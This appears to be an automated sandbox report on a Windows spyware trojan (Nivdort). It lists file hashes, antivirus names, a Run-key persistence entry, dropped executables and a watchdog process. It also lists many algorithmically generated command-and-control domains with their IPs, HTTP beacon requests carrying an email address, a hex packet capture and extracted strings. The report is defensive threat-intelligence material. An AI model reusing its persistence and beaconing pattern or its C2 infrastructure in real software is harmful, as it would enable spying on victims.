Analysis Date2014-01-20 22:22:21
MD5c2307ce655194784b31fb5559cc87731
SHA141b7f75abadedb7f65c146e39c95cbec5d114980

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9f2543fab5ce728d1810318aab5d79b7 sha1: ed3a1a68c4b3c3f628fcc8dcce737177bd9dcc96 size: 118272
Section.rdata md5: 7827a38d6d97260d8276025d4c51e65b sha1: b93bef2eca095e3f6e95533e750bfc6b051e9832 size: 17920
Section.data md5: 8f765e6c9f83ad84710aadbe52fd852e sha1: 7695ffe51f759d1b9b1cd5ce3f6d44d573cdf483 size: 16384
Timestamp2013-06-20 16:32:50
PackerMicrosoft Visual C++ ?.?
PEhash93fa9ac978fdf2d5663ba2e2c512b0529b894206
AVmsseTrojanSpy:Win32/Nivdort.G
AVaviraTR/Spy.Nivdort.G.52
AVavgAgent4.BNGM

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Security Net.Tcp Health Upgrade ➝
C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.trs
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\nsfonweetrj.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Local Settings\Application Data\pnetxmgowxdpxe\kqptaanavi.exe"

Network Details:

DNSsweetforest.net
Type: A
157.7.144.5
DNSlaughschool.net
Type: A
184.168.221.69
DNSsimpleschool.net
Type: A
216.250.126.173
DNSmotherschool.net
Type: A
64.74.223.44
DNSmountainschool.net
Type: A
184.168.221.15
DNSwinterschool.net
Type: A
82.98.134.9
DNSfinishschool.net
Type: A
208.73.211.70
DNSsimpletraining.net
Type: A
66.96.147.118
DNSprobablyforest.net
Type: A
DNSseveralwheat.net
Type: A
DNSmaterialwheat.net
Type: A
DNSseveralanger.net
Type: A
DNSmaterialanger.net
Type: A
DNSseveralalways.net
Type: A
DNSmaterialalways.net
Type: A
DNSseveralforest.net
Type: A
DNSmaterialforest.net
Type: A
DNSseveraschool.net
Type: A
DNSseverawhile.net
Type: A
DNSlaughwhile.net
Type: A
DNSseveraquestion.net
Type: A
DNSlaughquestion.net
Type: A
DNSseveratherefore.net
Type: A
DNSlaughtherefore.net
Type: A
DNSsimplewhile.net
Type: A
DNSmotherwhile.net
Type: A
DNSsimplequestion.net
Type: A
DNSmotherquestion.net
Type: A
DNSsimpletherefore.net
Type: A
DNSmothertherefore.net
Type: A
DNSpossibleschool.net
Type: A
DNSmountainwhile.net
Type: A
DNSpossiblewhile.net
Type: A
DNSmountainquestion.net
Type: A
DNSpossiblequestion.net
Type: A
DNSmountaintherefore.net
Type: A
DNSpossibletherefore.net
Type: A
DNSperhapsschool.net
Type: A
DNSwindowschool.net
Type: A
DNSperhapswhile.net
Type: A
DNSwindowwhile.net
Type: A
DNSperhapsquestion.net
Type: A
DNSwindowquestion.net
Type: A
DNSperhapstherefore.net
Type: A
DNSwindowtherefore.net
Type: A
DNSsubjectschool.net
Type: A
DNSwinterwhile.net
Type: A
DNSsubjectwhile.net
Type: A
DNSwinterquestion.net
Type: A
DNSsubjectquestion.net
Type: A
DNSwintertherefore.net
Type: A
DNSsubjecttherefore.net
Type: A
DNSleaveschool.net
Type: A
DNSfinishwhile.net
Type: A
DNSleavewhile.net
Type: A
DNSfinishquestion.net
Type: A
DNSleavequestion.net
Type: A
DNSfinishtherefore.net
Type: A
DNSleavetherefore.net
Type: A
DNSsweetschool.net
Type: A
DNSprobablyschool.net
Type: A
DNSsweetwhile.net
Type: A
DNSprobablywhile.net
Type: A
DNSsweetquestion.net
Type: A
DNSprobablyquestion.net
Type: A
DNSsweettherefore.net
Type: A
DNSprobablytherefore.net
Type: A
DNSseveralschool.net
Type: A
DNSmaterialschool.net
Type: A
DNSseveralwhile.net
Type: A
DNSmaterialwhile.net
Type: A
DNSseveralquestion.net
Type: A
DNSmaterialquestion.net
Type: A
DNSseveraltherefore.net
Type: A
DNSmaterialtherefore.net
Type: A
DNSseverahunger.net
Type: A
DNSlaughhunger.net
Type: A
DNSseveratraining.net
Type: A
DNSlaughtraining.net
Type: A
DNSseverastorm.net
Type: A
DNSlaughstorm.net
Type: A
DNSseverathrown.net
Type: A
DNSlaughthrown.net
Type: A
DNSsimplehunger.net
Type: A
DNSmotherhunger.net
Type: A
HTTP GEThttp://sweetforest.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://laughschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://simpleschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://motherschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://mountainschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://winterschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://finishschool.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
HTTP GEThttp://simpletraining.net/forum/search.php?email=ed.boggan@explicitlyrics.us&method=post
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 157.7.144.5:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.69:80
Flows TCP192.168.1.1:1033 ➝ 216.250.126.173:80
Flows TCP192.168.1.1:1034 ➝ 64.74.223.44:80
Flows TCP192.168.1.1:1035 ➝ 184.168.221.15:80
Flows TCP192.168.1.1:1036 ➝ 82.98.134.9:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.70:80
Flows TCP192.168.1.1:1038 ➝ 66.96.147.118:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 73776565 74666f72 6573742e   st: sweetforest.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6c617567 68736368 6f6f6c2e   st: laughschool.
0x00000080 (00128)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 73696d70 6c657363 686f6f6c   st: simpleschool
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6d6f7468 65727363 686f6f6c   st: motherschool
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6d6f756e 7461696e 7363686f   st: mountainscho
0x00000080 (00128)   6f6c2e6e 65740d0a 0d0a                ol.net....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 77696e74 65727363 686f6f6c   st: winterschool
0x00000080 (00128)   2e6e6574 0d0a0d0a 0d0a                .net......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 66696e69 73687363 686f6f6c   st: finishschool
0x00000080 (00128)   2e6e6574 0d0a0d0a 0d0a                .net......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f656d 61696c3d 65642e62   h.php?email=ed.b
0x00000020 (00032)   6f676761 6e406578 706c6963 69746c79   oggan@explicitly
0x00000030 (00048)   72696373 2e757326 6d657468 6f643d70   rics.us&method=p
0x00000040 (00064)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000050 (00080)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 73696d70 6c657472 61696e69   st: simpletraini
0x00000080 (00128)   6e672e6e 65740d0a 0d0a                ng.net....


Strings
Ajjj
                                 H
         (((((                  H
         h((((                  H
jjjh
jjjj
jjjjh
jjjjj
KERNEL32.DLL
mscoree.dll
@(null)
PB$B
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0Ghe"g
0SSSSS
0WWWWW
2D_^#&A
6!=8|<C@
'6 S}od
8VVVVV
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
AddAccessDeniedAce
AddAccessDeniedObjectAce
AddAce
ADVAPI32.dll
AllocateAndInitializeSid
An application has made an attempt to load the C runtime library incorrectly.
AppendMenuA
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
A>;zS]I
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
__based(
BeginPaint
CancelTimerQueueTimer
__cdecl
CharUpperBuffA
 Class Hierarchy Descriptor'
CloseDesktop
CloseEventLog
CloseHandle
__clrcall
CompareStringA
CompareStringW
 Complete Object Locator'
CONOUT$
`copy constructor closure'
CopyFileA
CorExitProcess
CountClipboardFormats
CreateActCtxA
CreateDIBPatternBrush
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateIconFromResourceEx
CreateMailslotA
CreatePolygonRgn
CreatePrivateObjectSecurityEx
CreatePrivateObjectSecurityWithMultipleInheritance
CreateProcessA
CreateRectRgn
CreateStreamOnHGlobal
CreateTapePartition
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
- CRT not initialized
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
DeferWindowPos
DefWindowProcA
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteEnhMetaFile
DeleteMenu
)*'Den
DeregisterShellHookWindow
DestroyAcceleratorTable
DestroyPrivateObjectSecurity
DispatchMessageA
DOMAIN error
DosDateTimeToFileTime
DPtoLP
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
EncodePointer
EndPaint
EndUpdateResourceA
EnterCriticalSection
EnumResourceTypesA
ExitProcess
E!YR`R<5o
__fastcall
February
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRgn
FindClose
FindFirstFileA
FindNextChangeNotification
FixBrushOrgEx
- floating point support not loaded
FloodFill
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
ForceRemove
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
^F<-uB
GDI32.dll
GdiFlush
GdiSetBatchLimit
GetAce
GetACP
GetActiveWindow
GetAltTabInfoA
GetCharacterPlacementA
GetClassInfoExA
GetClassWord
GetClipboardFormatNameA
GetCommandLineA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentDirectoryA
GetCurrentHwProfileA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDCOrgEx
GetDefaultCommConfigA
GetDesktopWindow
GetDeviceCaps
GetDoubleClickTime
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileSize
GetFileType
GetFirmwareEnvironmentVariableA
GetFontLanguageInfo
GetForegroundWindow
GetFullPathNameA
GetGUIThreadInfo
GetKeyNameTextA
GetLastActivePopup
GetLastError
GetLayout
GetLocaleInfoA
GetLogicalDrives
GetMailslotInfo
GetMapMode
GetMenu
GetMenuContextHelpId
GetMessageA
GetMessageExtraInfo
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetNextDlgGroupItem
GetOEMCP
GetOldestEventLogRecord
GetPriorityClass
GetPriorityClipboardFormat
GetProcAddress
GetProcessHeap
GetProcessShutdownParameters
GetProcessTimes
GetProcessVersion
GetProcessWindowStation
GetProfileIntA
GetSecurityDescriptorControl
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSystemPowerStatus
GetSystemTimeAsFileTime
GetTapeStatus
GetTempPathA
GetTextCharacterExtra
GetTextCharsetInfo
GetTextFaceA
GetTickCount
GetTimeZoneInformation
GetTitleBarInfo
GetUserObjectInformationA
GetWindowDC
GetWindowRect
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalCompact
GlobalFree
GlobalLock
GlobalSize
GlobalUnlock
gM<)1L
gNhz3'%
`h````
H4|vb>>;
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtXHHt
hU/N4k
<\iE+E
>If90t
InitializeCriticalSectionAndSpinCount
InsertMenuItemA
InterlockedDecrement
InterlockedExchangeAdd
InterlockedIncrement
InternalGetWindowText
InvalidateRect
invalid string position
InvertRgn
IsCharLowerA
IsDebuggerPresent
IsTokenRestricted
IsValidCodePage
j2h4HB
JanFebMarAprMayJunJulAugSepOctNovDec
January
j(h03B
j h(]B
j h(	B
j!hlHB
j@j ^V
j"^SSSSS
KERNEL32.dll
&L2-yFo)YF
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadCursorA
LoadCursorFromFileA
LoadLibraryA
LocalCompact
LocalFree
LocalReAlloc
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LogonUserA
LookupPrivilegeNameA
LPtoDP
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapDialogRect
MapVirtualKeyA
MaskBlt
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
;mo@Mvz
Monday
MoveWindow
MulDiv
MultiByteToWideChar
nCt] ,
 new[]
"nkHyDf
NoRemove
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
nz<B7=
October
OffsetRect
OffsetViewportOrgEx
oi,7w4
ole32.dll
OLEAUT32.dll
`omni callsig'
OpenEncryptedFileRawA
OpenProcess
OpenProcessToken
operator
__pascal
Pf95(~B
PgB~;j!
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PolyBezierTo
PolyDraw
PostQuitMessage
PPPPPPPP
PrivateExtractIconsA
Process32First
Process32Next
Program: 
<program name unknown>
__ptr64
PtVisible
- pure virtual function call
Q ^e`8
Q@-lRA
qn)W87S
QQSVWd
QueryPerformanceCounter
RaiseException
`.rdata
ReadFile
RectVisible
RegCloseKey
RegisterClassExA
RegisterDeviceNotificationA
RegOpenKeyA
RegSetValueExA
ReleaseDC
ResetDCA
ResizePalette
__restrict
RFrk}y
rIH0eO
RtlUnwind
runtime error 
Runtime Error!
Saturday
`scalar deleting destructor'
SelectPalette
September
SetBitmapDimensionEx
SetCommMask
SetDeviceGammaRamp
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileAttributesA
SetFilePointer
SetFileSecurityA
SetFocus
SetHandleCount
SetLastError
SetLayout
SetMapMode
SetMenuContextHelpId
SetPolyFillMode
SetProcessAffinityMask
SetROP2
SetScrollPos
SetSecurityDescriptorRMControl
SetSecurityDescriptorSacl
SetStdHandle
SetUnhandledExceptionFilter
SetWindowsHookExA
SetWindowTextA
ShowWindow
SignalObjectAndWait
SING error
SizeofResource
s[S;7|G;w
^SSSSS
__stdcall
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SwitchDesktop
SwitchToThisWindow
?Sx);+B@4
s.z<t8
TerminateProcess
tGHt.Ht&
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
<\tM</tI
tR99u2
TrackPopupMenu
TrackPopupMenuEx
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
 Type Descriptor'
`typeof'
>:u8FV
`udt returning'
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHook
UNICODE
Unknown exception
UnregisterWait
UpdateLayeredWindow
UpdateResourceA
UpdateWindow
UQPXY]Y[
URPQQhd
USER32.dll
USER32.DLL
u[SSSP
UTF-16LE
v$;5<mB
`vbase destructor'
`vbtable'
`vcall'
vDaW;"
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
`virtual displacement map'
VirtualFree
VirtualProtectEx
VirtualQueryEx
VkKeyScanExA
v	N+D$
VVVVVQRSSj
})Vz`_
WaitForSingleObject
Wednesday
WideCharToMultiByte
WidenPath
WinHelpA
-Wk*83
WriteConsoleA
WriteConsoleW
WriteFile
WriteFileGather
WS2_32.dll
x}<J@>
xppwpp
xpxxxx
<xtX<XtT
y/3mbH
>=Yt1j
}Z5Mbp
ZombifyActCtx
?Z`Sz#